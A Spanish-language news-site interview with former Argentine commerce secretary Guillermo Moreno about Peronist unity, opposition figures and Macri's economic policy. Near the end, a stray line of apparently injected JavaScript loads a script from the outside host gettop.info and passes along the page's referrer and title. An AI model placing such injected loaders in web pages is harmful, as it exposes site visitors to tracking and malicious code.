Moreno: “No voy a ser más funcionario ni candidato”

LBF entrevistó al siempre polémico ex secretario de Comercio. Reivindicó la unidad del Peronismo y le abrió las puertas a Massa y a Barrionuevo. Aseguró que su futuro político será sólo de militancia.

Por Federico Millenaar

Guillermo Moreno

Guillermo Moreno

¿Cómo viene el proceso de unificación del Peronismo?

El proceso está muy bien.  Estamos conformes porque impedimos el desembarco del proyecto oligárquico en nuestras playas. En diciembre, el actual oficialismo había elegido a uno de los nuestros para que le “hiciera la segunda” explicándole al pueblo argentino porque tenía que aumentar la pobreza. Se lo llevó a Davos y dijo que él sería el próximo presidente del Justicialismo. Pero bueno, hoy no es así y Massa  de alguna manera recompuso su visión. Su equipo económico está haciendo diagnósticos correctos sobre lo que está pasando.  El Peronismo está en condiciones de plantear un salto hacia adelante y, como dice su marcha, todos unidos  podremos triunfar.

¿Qué candidato le gustaría que conduzca?

No, creo que el Peronismo se está reorganizando y está en ebullición.  Va a haber una interna importante y se van a ir perfilando los distintos espacios de conducción. El año que viene las elecciones son legislativas y van a empezar a aparecer conducciones distritales  A partir de ahí se va a consolidar la gran mesa que todos intentamos armar. ¿Quién va a conducir? El que conduce. Es un debate que se puede tener a tu edad (al cronista),  pero ya  a mi edad es un debate estéril. Conduce el que conduce.

¿Quién va a conducir el Peronismo? El que conduce. Es un debate que a mi edad es estéril. Conduce el que conduce.

Pareciera que Cristina Kirchner no tiene el mismo interés por la unificación…

Cristina es la dirigente más importante del Justicialismo en términos de votos individuales.

Pero no hace la misma campaña fuerte que usted por la unidad…

Cada uno tiene su estilo. Ella en su último discurso público dijo que había que trabajar por la unidad de los argentinos.  Y no se puede trabajar por la unidad de los argentinos sin trabajar por la unidad del Peronismo. A mí me parece que está haciendo el mismo esfuerzo pero con otro estilo y otras características.

¿Está rota la relación de Cristina con algunos dirigentes como Bossio o Pichetto?

No, el Peronismo vos sabés cómo es. En el Peronismo siempre hay distintas sutilezas y estilos, pero esperemos el proceso. Lo importante es el proceso y no las situaciones personales. No se hace política analizando situaciones personales.

¿Cómo proyecta hacia el futuro esta falta de disciplina partidaria que estuvo favoreciendo a Macri?

Yo no veo falta de disciplina partidaria. El Partido Justicialista tuvo compañeros que votaron a favor y en contra de la ley que habilitó el pago a los fondos buitre. ¿Cuál es el problema? ¿Cuál es la falta de disciplina?

Cristina, que como usted dijo es la que tiene más votos, llamó a votar en contra…

Evidentemente los  votos individuales no son todo el universo. Pero eso no significa que haya falta de disciplina.  El Peronismo está en ebullición, por eso es que hay que armar una mesa que contenga a todos los sectores. A (José Manuel) De la Sota, a (Carlos) Verna, a los Rodríguez Saa.

¿A Massa?

Si se desabrocha un botón del saco, porque con los tres botones abrochados es muy inglés. Su equipo económico ya está haciendo diagnósticos prácticamente idénticos a los que hacemos nosotros.  Si tenés el mismo diagnóstico económico a la larga la praxis política no puede ser muy distinta. Más difícil va a ser sentar a Barrionuevo, pero lo vamos a sentar. A la larga,  a medida que sigan cerrando restaurantes y confiterías… ¿en qué mesa se va a sentar Luisito? No hay muchas alternativas.  Va a ser divertida la foto de la mesa cuando esté sentada Cristina  de un lado y Barrionuevo  del otro.

Más difícil va a ser sentar a Barrionuevo, pero lo vamos a sentar. Va a ser divertida la foto de la mesa cuando esté sentada Cristina de un lado y Barrionuevo  del otro.

¿Puede llegar a pasar eso?

Yo trabajo para eso. Imagínate si dentro de 6 meses hay una foto donde están sentados Cristina y Barrionuevo.

No creo que ninguno de los dos se saque esa foto…

Vamos a  ver, tantas cosas han pasado  en el peronismo.

¿Están un poco flojos los sindicalistas peronistas para hacerle reclamos al Gobierno?

No, no.

Están cerrando paritarias por debajo de la inflación…

Yo soy muy respetuoso de todos los dirigentes sindicales.  Es obvio que podés discutir una paritaria con cierto nivel de actividad y otra cuando los muchachos están perdiendo el trabajo. Es la lógica de este modelo oligárquico  que atenta contra los trabajadores.   Los dirigentes sindicales  hoy negocian unas paritarias y el año que viene ya veremos.  De hecho, ya se están uniendo y hace poco hicieron un acto extraordinario. Están trabajando todos muy bien, hasta Barrionuevo. No tengo ninguna objeción, al contrario, creo que está trabajando muy bien.

¿Qué cambio nota en Barrionuevo respecto a un año atrás?

Nada, obviamente que cambió el contexto y él se está adecuando.  Cuando estábamos nosotros todos los días se abría un restaurante. A Barrionuevo no le fue mal con nuestro gobierno. ¿O no inauguró el Hotel Sasso?

¿Por qué era tan opositor entonces?

No lo sé,  en el Peronismo somos gente muy especial.  Pero no le fue mal al gremio ni al sector.  Ahora les empezó a ir mal y simplemente hay que esperar a que se acomoden los melones. Yo creo que van a estar todos en esta mesa redonda.  Ahora pareciera que no,  pero vamos a ver.  Antes me decían que no iba a haber  lista de unidad y ahí está.  La primera vez que dije que Carlos Verna  podía  estar en la conducción del partido me mandó a decir que creía que era un chiste.  Pero ahora está.

Guillermo-Moreno

¿Qué pasa si no se suma Massa?

Yo tengo la sensación que van a estar todos, hasta Barrionuevo y Duhalde. Todos. El Peronismo unido garantiza que ganamos la elección. Los que no quieren un Peronismo unido son los otros, nosotros queremos estar todos juntos. Bastante avanzamos con la lista de unidad, es un problema de tiempo. Si el año que viene en la provincia de Buenos Aires hay tres listas en vez de dos, gana Macri. Entonces, el Peronismo ante esa opción se va a unir. No vamos a hacer lo mismo que hicimos en la última elección. Juntos ganamos, la lógica es que estemos juntos.

Si el año que viene en la provincia hay tres listas en vez de dos, gana Macri. Entonces el Peronismo ante esa opción se va a unir. No vamos a hacer lo mismo que hicimos en la última elección.

¿Cómo son los empresarios a la hora de negociar?

Los empresarios cuando se dan cuenta cómo son las reglas del juego… Yo he tenido reuniones que duraban menos de un minuto. En 20 minutos hacía 15 reuniones. Tal vez hubo cosas los primeros 60 días, en los primeros rounds, pero después no tuve más problemas. Tengo el mejor de los conceptos de los empresarios.

¿Leyó la nota de Julio Blanck donde reconoce que Clarín hizo periodismo de guerra? (El cronista lee parte del artículo)

No la leí. Pero valoro esas declaraciones, es un punto de partida importante para poder encontrarnos en algún lugar. Valoro esa declaración, me parece que no es lo mismo que Héctor Magnetto, que es un criminal de lesa humanidad. Blanck está cobrando de un grupo económico que tiene las manos manchadas de sangre, pero valoro esa honestidad.

El Kirchnerismo se enfrentó con Clarín, con el “Campo”, con el “Partido Judicial”…

El enfrentamiento fue con la oligarquía, que es la confrontación histórica y fue por el precio de la comida. Ahora este gobierno oligárquico les dio el precio de la comida que ellos querían, por eso aumentó tan brutalmente.  Nosotros tuvimos esa confrontación con la 125. Después el tema con Magneto…. (hace un gesto minimizando el tema).

¿Qué pelea era más importante para ustedes?

Siempre es con la oligarquía. Yo diferencio entre poder y gobierno porque no pudimos impedir el accionar de la oligarquía en la conformación de los costos de los alimentos.

¿Qué falló?

Falló la acumulación. Llegás hasta donde llegás. Tiempos, esfuerzo, quizás algo de inteligencia. La tercera será la vencida. Perón no pudo, nosotros tampoco, esperemos que sea en la tercera.

La pelea siempre es con la oligarquía. La tercera será la vencida. Perón no pudo, nosotros tampoco, esperemos que sea en la tercera.

¿Usted cree en la Justicia? La ex presidenta decía que eran una corporación, con intereses propios, etc.

No, no es mi opinión. Creo en la Justicia. Habrá algunos jueces como Bonadio que son muchachos muy especiales. Yo lo conozco del Peronismo de la Capital. A mí me procesó dos veces sin el fiscal, solamente porque lo impulsa Clarín. Bonadio es un muchacho especial pero no es la Justicia. La Justicia es un poder del Estado. Si no creemos en la Justicia tenemos un lío bárbaro.

¿Los casos de corrupción dañaron al Peronismo más que cualquier error político?

No, el error que cometimos nosotros fue no haber hablado de la Tercera Guerra Mundial. No hubiera sido una campaña tan “light” y no habría ganado el más “light”. La Tercera Guerra Mundial es producto de los desajustes estructurales que hay en la economía global y solo se van a ajustar por el vector de la violencia. La revolución energética norteamericana ha generado una ganancia de productividad que convirtió en perdedores a los pueblos europeos. El “Brexit” fue una de las batallas, está claro que los ingleses votaron así porque estamos en medio de una Tercera Guerra Mundial. ¿Te parece que Macri es un presidente para dirigir un país cuando el mundo está en guerra?

¿Extraña el cargo en la Secretaría de Comercio?

No, ahora puedo hablar. Ahora tengo más capacidad de comunicarme con la gente. Antes no recibía a casi nadie y ahora hablo con periodistas todos los días. ¿Cuándo tenés más llegada?

Yo elegiría ser funcionario para tener incidencia en la política real…

Yo no, yo no voy a ser más funcionario, ni candidato. Ya está, tienen que venir otras generaciones. Estamos haciendo lo que tenemos que hacer porque el actual oficialismo está conduciendo la nación a una situación complicada, ha aumentado el hambre.

No voy a ser más funcionario, ni candidato. Ya está, tienen que venir otras generaciones.

¿Por qué no aprovechar su capital político dentro del Peronismo?

No, si Magnetto dice que soy “piantavotos”.

¿Y si se lo pide Cristina?

No, no voy a ser. No funciona así el Peronismo. Vamos a ir a una interna y el que saque más votos va a conducir y los otros van a acompañar. En ese proceso tenemos que ir.

Los problemas de gobernabilidad en los últimos 50 años se dieron cuando el déficit fiscal se espiralizó. Y para el final del año estos van a llegar con un déficit de casi diez puntos. Ahí es donde se produce el problema, no lo busques por el lado de la oposición.

¿Cree que Macri puede llegar a tener problemas de gobernabilidad?

Los problemas de gobernabilidad en los últimos 50 años se dieron cuando el déficit fiscal se espiralizó. Y para el final del año estos van a llegar con un déficit de casi diez puntos. Ahí es donde se produce el problema, no lo busques por el lado de la oposición. Le sacaron la comida de la boca a la gente. Están tomando decisiones que son antagónicas entre sí: aumentas la comida, la tasa de interés y el déficit fiscal. Son incompatibles entre sí. El sector privado no tiene crédito por las altas tasas, no tiene demanda porque aumentaste la comida y los sectores populares ya no tienen sobrante para consumir; después se asustan por la recesión y mandan al ministro de Hacienda a gastar a lo pavote. Están espiralizando el déficit fiscal en una economía que se achica. Dijeron que venían a incentivar el sector privado y lo único que incentivan es el gasto del Estado. Tienen un lío en la cabeza.

¿Lo atribuye a una interna entre Prat Gay y Sturzzeneguer?

Es porque no saben. Vos crees que saben porque son rubios, pero no saben.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Federico Millenaar
Sígueme en

Federico Millenaar

Politólogo y maestrando en Periodismo, autor y fundador en LaBrokenface.
Federico Millenaar
Sígueme en
Facebooktwittergoogle_plusredditpinterestmail

Publicado por .

Comentarios